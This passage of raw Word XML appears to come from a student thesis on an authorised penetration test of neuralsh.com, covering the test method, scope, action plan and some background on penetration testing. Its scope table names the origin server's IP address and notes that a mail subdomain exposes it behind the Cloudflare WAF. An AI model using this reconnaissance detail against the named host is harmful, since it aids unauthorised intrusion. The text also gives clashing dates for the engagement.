        <w:t>Perform exploitation on misconfigured systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Analyze post-exploitation lateral movement risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create an official VAPT report for the stakeholder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Produce remediation recommendations for all identified vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Publish the finalized thesis document for academic submission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. Solutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The core approach to addressing the security weaknesses identified in this project was to treat every vulnerability not as an isolated finding, but as part of a broader picture of the target's overall security posture. Rather than simply listing what was broken, the methodology aimed to understand how vulnerabilities connect — how one misconfiguration could be chained with another to produce an outcome far more severe than either finding alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To find the weakness of the systems, penetration testing was performed following the OWASP TOP 10 framework as a baseline. For each finding, the following solution path was applied:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. Identify the vulnerability through active testing and passive reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. Validate it with a controlled proof-of-concept to confirm exploitability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. Score it using CVSS v3.1 to communicate risk objectively</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. Recommend a specific, actionable remediation step tailored to the technology stack in use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The official penetration testing report produced at the end of this engagement documents all findings in a format designed to help the stakeholder understand both the technical detail and the business impact — making it straightforward to prioritize and act on remediation without requiring deep security expertise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5. Project Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This internship engagement focused on the external attack surface of neuralsh.com and its underlying hosting infrastructure, authorized in writing by Prestige Alliance Co., Ltd. Testing was conducted using a black-box approach — meaning no credentials, source code, or internal documentation were provided prior to testing. Everything discovered was derived from publicly accessible systems and open-source intelligence, simulating the real-world perspective of an external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The table below defines the systems that were in scope for this engagement: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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Asset**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Type**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Description**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`neuralsh.com`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Primary target — Nuxt.js frontend, protected by Cloudflare WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`*.neuralsh.com`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Subdomains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>All subdomains discoverable via DNS enumeration or certificate transparency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`mail.neuralsh.com`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Origin server entry point — resolves directly to 103.16.62.217</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`103.16.62.217`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Origin Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Backend infrastructure hosting the application, database, mail stack, and admin panels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 1: Engagement scope — in-scope systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The following were explicitly out of scope: third-party services not owned by the target (including Cloudflare's own infrastructure), physical access testing, social engineering, denial of service attacks, and any IP address not belonging to the target organization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This engagement was authorized by Prestige Alliance Co., Ltd. for the period of June 2026, aligned with the academic thesis submission schedule. All findings are treated as confidential and disclosed exclusively to Prestige Alliance Co., Ltd. and the supervising academic institution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6. Action Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To make the internship progress go as planned, the activities below were organized into a weekly timeline spanning the full engagement period. The plan covers two periods: February to March (vulnerability assessment and lab training) and April to May (production penetration testing, report creation, and remediation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Table 2: Action plan from February to March — see ACTION_PLAN.pdf]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Table 3: Action plan from April to May — see ACTION_PLAN.pdf]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7. Organization Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prestige Alliance Co., Ltd. is an information technology and cybersecurity solutions company operating in Cambodia. The company provides a range of services including network infrastructure design, system integration, software development, and cybersecurity consulting — supporting both private sector clients and government-linked organizations across the country.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 1: Prestige Alliance logo — prestige_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prestige Alliance is committed to helping organizations in the region build and maintain secure, reliable digital systems. With a team of experienced engineers and security practitioners, the company bridges the gap between technical security expertise and business-level risk management — making professional security services accessible to organizations that might otherwise lack the internal capacity to address cyber threats effectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>As a cybersecurity-oriented firm, Prestige Alliance recognizes the importance of developing the next generation of security talent. This internship was conducted under the company's technical team, providing a structured environment for hands-on penetration testing work on an authorized real-world target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 2: Prestige Alliance office location — map.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Address: [Company Address], Phnom Penh, Cambodia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Website: [Company Website]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Email: [Company Email]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Telephone: [Company Phone]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 2: CONCEPTS OF PENETRATION TESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This chapter establishes the theoretical and practical foundation for the penetration testing work carried out in this internship. It covers what penetration testing is and why it matters, how practical skills were built using platforms such as Hack The Box, the structured process followed during an engagement, and the key industry frameworks and vulnerability classification systems that guided this work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Introduction to Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Penetration testing, commonly referred to as "pentesting," is the practice of simulating a real-world cyberattack against a system, application, or network with explicit authorization from the owner. Unlike passive security audits that rely on configuration reviews and interviews, penetration testing produces tangible evidence of what an attacker could actually do — which vulnerabilities can be exploited, how far an attacker can move once inside, and what the realistic business impact would be.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The discipline draws a clear line between authorized security testing and unauthorized computer access. A penetration tester operates under a defined scope and rules of engagement, documenting every step in a way that allows the organization to reproduce, verify, and remediate the findings. This makes penetration testing one of the most direct and credible inputs to an organization's risk management process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Modern penetration testing spans several domains: web application testing, network testing, cloud infrastructure testing, physical security, and social engineering. This internship focused on external web application and infrastructure penetration testing — the domain most directly relevant to organizations that expose services to the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. Learning Penetration Testing via Hack The Box</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 3: Hack The Box logo — htb_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Practical penetration testing skills cannot be developed from theory alone. Before engaging real-world targets, testers must build hands-on experience in controlled environments. Hack The Box (HTB) is one of the most widely recognized platforms for this purpose. It provides a constantly updated library of deliberately vulnerable machines, web applications, and challenge scenarios that simulate real vulnerabilities found in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
